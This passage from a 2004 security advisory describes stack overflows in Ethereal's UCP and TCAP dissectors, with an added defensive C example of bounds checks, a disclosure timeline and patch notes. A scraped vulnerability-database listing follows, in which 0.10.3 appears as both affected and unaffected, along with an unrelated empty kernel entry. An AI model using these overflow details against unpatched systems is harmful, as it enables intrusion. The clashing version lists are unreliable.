         buffer of BUFSIZ bytes may overflow and can therefore lead to
         remote code execution.
         To exploit this vulnerability over the wire an attacker must 
         be able to fit more than BUFSIZ bytes into one TCP packet.
         This means it is only exploitable on the wire if the system
         has a MTU bigger than BUFSIZ. BUFSIZ is 8192 on glibc 
         systems, 1024 on BSD systems and 512 on Windows systems.


   [13] UCP Protocol Handle Time-Field Overflow
   ----------------------------------------------
   
   Desc: When handling a Time field within a UCP packet, a stack
         buffer of BUFSIZ bytes may overflow and can therefore lead
         to remote code execution.
         To exploit this vulnerability over the wire an attacker must 
         be able to fit more than BUFSIZ bytes into one TCP packet.
         This means it is only exploitable on the wire if the system
         has a MTU bigger than BUFSIZ. BUFSIZ is 8192 on glibc 
         systems, 1024 on BSD systems and 512 on Windows systems.
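   The bug class behind items [09] to [13] is the same in every case: a
   length or delimiter position taken from the packet decides how many
   bytes are written into a fixed-size stack buffer. The following C code
   is an added example and is not part of this advisory or of Ethereal's
   source. It assumes a generic dissector shape: an ASN.1 length-prefixed
   field read into a 4-byte variable (the TCAP transaction ID case of item
   [10], with 0x48 used as an assumed tag value) and a '/'-delimited
   UCP-style text field copied into a BUFSIZ-byte stack buffer (items [11]
   to [13], sized as the advisory describes). Helper names, sample packets
   and the tag value are constructed for the example; what it shows is the
   bounds check a dissector must perform before each copy, and how the
   oversized cases are rejected rather than copied.

```c
#include <stdio.h>    /* BUFSIZ, printf */
#include <stdint.h>
#include <string.h>

/* Hypothetical helpers written for this advisory, NOT Ethereal's dissector
 * code. The vulnerable shape in items [09]-[13] is memcpy(dst, src, len)
 * with len (or the delimiter position) taken from the packet; here every
 * copy is preceded by the bounds check that prevents the overflow. */

/* Copy only if the field fits both the destination and the bytes actually
 * present in the packet. Returns bytes copied, or -1 and copies nothing. */
static int copy_field_checked(uint8_t *dst, size_t dst_size,
                              const uint8_t *src, size_t src_avail, size_t len)
{
    if (len > dst_size || len > src_avail)
        return -1;
    memcpy(dst, src, len);
    return (int)len;
}

/* Minimal ASN.1 BER reader: one tag byte, short-form length, value.
 * Returns the value length and sets *value, or -1 if the element is
 * truncated or uses a long-form length (out of scope here). */
static int parse_tlv(const uint8_t *buf, size_t buflen, uint8_t tag,
                     const uint8_t **value)
{
    if (buflen < 2 || buf[0] != tag)
        return -1;
    size_t len = buf[1];
    if ((len & 0x80) || len > buflen - 2)
        return -1;
    *value = buf + 2;
    return (int)len;
}

/* Item [10]: a TCAP-style Transaction ID read into a 4-byte variable.
 * Tag 0x48 is an assumed sample value. A TID longer than 4 bytes is the
 * overflow the advisory describes; it is refused, not copied. */
int extract_tid(const uint8_t *buf, size_t buflen, uint32_t *tid_out)
{
    const uint8_t *val = NULL;
    uint8_t raw[4] = {0};
    int len = parse_tlv(buf, buflen, 0x48, &val);
    if (len < 0 ||
        copy_field_checked(raw, sizeof raw, val, buflen - 2, (size_t)len) < 0)
        return -1;
    *tid_out = ((uint32_t)raw[0] << 24) | ((uint32_t)raw[1] << 16) |
               ((uint32_t)raw[2] << 8) | raw[3];
    return len;
}

/* Items [11]-[13]: a '/'-delimited UCP-style text field copied into a
 * BUFSIZ-byte buffer. Returns the field length, or -1 when the field plus
 * its terminating NUL would not fit. */
int extract_ucp_field(const uint8_t *buf, size_t buflen,
                      char *out, size_t out_size)
{
    size_t n = 0;
    while (n < buflen && buf[n] != '/')
        n++;
    if (n >= out_size)
        return -1;
    memcpy(out, buf, n);
    out[n] = '\0';
    return (int)n;
}

/* Demo wrappers over constructed sample packets, so results can be checked. */
uint32_t demo_tid_value(void)        /* well-formed 4-byte TID */
{
    static const uint8_t pkt[] = {0x48, 0x04, 0xDE, 0xAD, 0xBE, 0xEF};
    uint32_t tid = 0;
    return extract_tid(pkt, sizeof pkt, &tid) == 4 ? tid : 0;
}

int demo_tid_oversized(void)         /* 5-byte TID: must be rejected */
{
    static const uint8_t pkt[] = {0x48, 0x05, 0x01, 0x02, 0x03, 0x04, 0x05};
    uint32_t tid = 0;
    return extract_tid(pkt, sizeof pkt, &tid);
}

/* Build a field of field_len 'A's followed by '/' and parse it into a
 * BUFSIZ-byte stack buffer, the size the advisory gives for the dissector's. */
int demo_ucp_field(size_t field_len)
{
    static uint8_t packet[BUFSIZ * 2];
    char field[BUFSIZ];
    if (field_len + 1 > sizeof packet)
        return -2;
    memset(packet, 'A', field_len);
    packet[field_len] = '/';
    return extract_ucp_field(packet, field_len + 1, field, sizeof field);
}

int main(void)
{
    printf("TID: 0x%08X\n", (unsigned)demo_tid_value());
    printf("oversized TID: %d\n", demo_tid_oversized());
    printf("16-byte UCP field: %d\n", demo_ucp_field(16));
    printf("BUFSIZ-byte UCP field: %d\n", demo_ucp_field(BUFSIZ));
    return 0;
}
```

   Note that the UCP check refuses a field of exactly BUFSIZ bytes: the
   NUL terminator needs one byte too, which is the off-by-one a
   "does it fit" check written as `n > out_size` would miss.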


Proof of Concept:

   e-matters is not going to release an exploit for any of these 
   vulnerabilities to the public. 
  

Disclosure Timeline:

    5. March 2004 - Ethereal developers were contacted by email
                    telling them about 10 (of the 13) holes.
                    6 holes were closed the same day: EIGRP, IGAP,
                    ISUP and BGP.
    7. March 2004 - IRDA hole closed (after checking specs)
    8. March 2004 - PGM hole closed (after checking specs)
    9. March 2004 - NetFlow hole closed (after checking specs)
   17. March 2004 - UCP holes were discovered and mailed to vendor
   19. March 2004 - UCP and TCAP holes closed (after checking specs)
   22. March 2004 - Ethereal developers have released a mini advisory
                    urging their users to upgrade to version 0.10.3,
                    which will be released later this week
   23. March 2004 - Public Disclosure


CVE Information:

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   assigned the name CAN-2004-0176 to this issue.


Recommendation:

   Until you can upgrade to version 0.10.3 of Ethereal or to the
   bug-fixed package from your distributor, it is strongly recommended
   to disable the following dissectors in the menu:
   
   Analyze->Enabled Protocols
   
   disable: BGP, EIGRP, IGAP, IRDA, ISUP, NetFlow, PGM, TCAP, UCP
   
   
GPG-Key:

   http://security.e-matters.de/gpg_key.asc
    
   pub  1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam
   Key fingerprint = 43DD 843C FAB9 832A E5AB  CAEB 81F2 8110 75E7 AAD6


Copyright 2004 Stefan Esser. All rights reserved.


-- 

--------------------------------------------------------------------------
 Stefan Esser                                        s.esser@e-matters.de
 e-matters Security                         http://security.e-matters.de/

 GPG-Key                gpg --keyserver pgp.mit.edu --recv-key 0xCF6CAE69 
 Key fingerprint       B418 B290 ACC0 C8E5 8292  8B72 D6B0 7704 CF6C AE69
--------------------------------------------------------------------------
 Did I help you? Consider a gift:            http://wishlist.suspekt.org/
--------------------------------------------------------------------------
    

- Vulnerability Information

13847
Linux Kernel shmctl() Function Arbitrary Locked Memory Access

- Vulnerability Description

Unknown or Incomplete

- Timeline

2005-02-15 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Ethereal Multiple Vulnerabilities
Unknown 9952
Yes Yes
2004-03-22 12:00:00 2009-07-12 03:06:00
Discovery is credited to Stefan Esser and Jonathan Heusser.

- Affected Software Versions

SGI ProPack 3.0
SGI ProPack 2.4
SGI ProPack 2.3
Gentoo Linux 1.4 _rc3
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
Gentoo Linux 1.4
Ethereal Group Ethereal 0.10.2
Ethereal Group Ethereal 0.10.1
Ethereal Group Ethereal 0.10
Ethereal Group Ethereal 0.9.16
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
Ethereal Group Ethereal 0.9.15
Ethereal Group Ethereal 0.9.14
Ethereal Group Ethereal 0.9.13
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Fedora Core1
Ethereal Group Ethereal 0.9.12
Ethereal Group Ethereal 0.9.11
Ethereal Group Ethereal 0.9.10
+ Conectiva Linux 9.0
Ethereal Group Ethereal 0.9.9
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Ethereal Group Ethereal 0.9.8
+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ Terra Soft Solutions Yellow Dog Linux 3.0
Ethereal Group Ethereal 0.9.7
Ethereal Group Ethereal 0.9.6
+ Conectiva Linux Enterprise Edition 1.0
Ethereal Group Ethereal 0.9.5
Ethereal Group Ethereal 0.9.4
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
Ethereal Group Ethereal 0.9.3
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Ethereal Group Ethereal 0.9.2
Ethereal Group Ethereal 0.9.1
- Compaq Tru64 5.0
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- HP HP-UX 11.0
- IBM AIX 5.1
- Linux kernel 2.4
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0
- NetBSD NetBSD 1.5
- OpenBSD OpenSSH 3.0
- SCO Unixware 7.0
- SGI IRIX 6.0
- Sun Solaris 8_sparc
Ethereal Group Ethereal 0.9
Ethereal Group Ethereal 0.8.19
Ethereal Group Ethereal 0.8.18
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2
Ethereal Group Ethereal 0.8.14
Ethereal Group Ethereal 0.8.13
Ethereal Group Ethereal 0.10.3
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ Red Hat Fedora Core2
+ Red Hat Fedora Core1
+ S.u.S.E. Linux Personal 9.2
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.0

- Unaffected Software Versions

Ethereal Group Ethereal 0.10.3
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ Red Hat Fedora Core2
+ Red Hat Fedora Core1
+ S.u.S.E. Linux Personal 9.2
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.0

- Vulnerability Discussion

Ethereal 0.10.3 has been released to address multiple vulnerabilities. These issues include:

- Thirteen stack-based buffer overruns in various protocol dissectors (NetFlow, IGAP, EIGRP, PGM, IrDA, BGP, ISUP, and TCAP).

- A denial of service that is triggered by a zero length Presentation protocol selector.

- Specially crafted RADIUS packets may cause a crash in Ethereal.

- Corrupt color filter files may cause a crash in Ethereal.

These issues may result in a denial of service or, in the case of the buffer overruns, potentially be leveraged to execute arbitrary code.

- Exploit

Exploit code has been provided to leverage the EIGRP TLV_IP_INT overflow to produce a denial of service condition. Exploit code to leverage the IGAP issue has been provided as well.

- Solution

The vendor has released version 0.10.3 to address these issues.

SGI has released an advisory (20040402-01-U) and a patch to address these issues in SGI ProPack versions 2.3 and 2.4. The vendor has advised that customers apply this patch as soon as possible. Further details regarding obtaining and applying an appropriate patch can be found in the referenced advisory. The patch is linked below.

Gentoo has released an advisory (GLSA 200403-07) and updates to address these issues. Gentoo users are advised to upgrade to current packages by emerging the updated packages as follows:
# emerge sync
# emerge -pv ">=net-analyzer/ethereal-0.10.3"
# emerge ">=net-analyzer/ethereal-0.10.3"

Netwosix Linux has released advisory LNSA-#2004-0007 dealing with these issues. Please see the referenced advisory for more information.

RedHat Enterprise Linux has released advisory RHSA-2004:136-09 dealing with this issue. Please see the referenced advisory for more information and details on obtaining fixes.

RedHat has released advisory RHSA-2004:137-01 dealing with this issue. Please see the referenced advisory for more information and details on obtaining fixes.

Mandrake has released an advisory that includes updates for this issue.

Conectiva has released an advisory CLSA-2004:835 to address these issues. Please see the advisory in web references for more details.

OpenPKG has released advisory OpenPKG-SA-2004.015 and an update dealing with this issue. Please see below for the update, and the referenced advisory for more information.

SGI has released an advisory (20040506-01-U) with Patch 10075 for SGI ProPack 3 to address these and other issues. Please see the referenced advisory for more information.

Debian has released advisory DSA 511-1 to address this issue. It is noted that CAN-2004-0176 partially affects Debian woody and CAN-2004-0367/CAN-2004-0365 do not affect the distribution at all. Please see the attached advisory for more details on obtaining fixes.

RedHat has released a Fedora legacy advisory (FLSA:1840) to address various issues in Ethereal. This advisory fixes these issues in Red Hat Linux 7.3 and 9 running on the i386 architecture. Please see the referenced advisory for more details and information about obtaining fixes.


Ethereal Group Ethereal 0.10
Ethereal Group Ethereal 0.10.1
Ethereal Group Ethereal 0.10.2
Ethereal Group Ethereal 0.8.13
Ethereal Group Ethereal 0.8.14
Ethereal Group Ethereal 0.8.18
Ethereal Group Ethereal 0.8.19
Ethereal Group Ethereal 0.9
Ethereal Group Ethereal 0.9.1
Ethereal Group Ethereal 0.9.10
Ethereal Group Ethereal 0.9.11
Ethereal Group Ethereal 0.9.12
Ethereal Group Ethereal 0.9.13
Ethereal Group Ethereal 0.9.14
Ethereal Group Ethereal 0.9.15
Ethereal Group Ethereal 0.9.16
Ethereal Group Ethereal 0.9.2
Ethereal Group Ethereal 0.9.3
Ethereal Group Ethereal 0.9.4
Ethereal Group Ethereal 0.9.5
Ethereal Group Ethereal 0.9.6
Ethereal Group Ethereal 0.9.7
Ethereal Group Ethereal 0.9.8
Ethereal Group Ethereal 0.9.9
SGI ProPack 2.3
SGI ProPack 2.4
SGI ProPack 3.0

- References
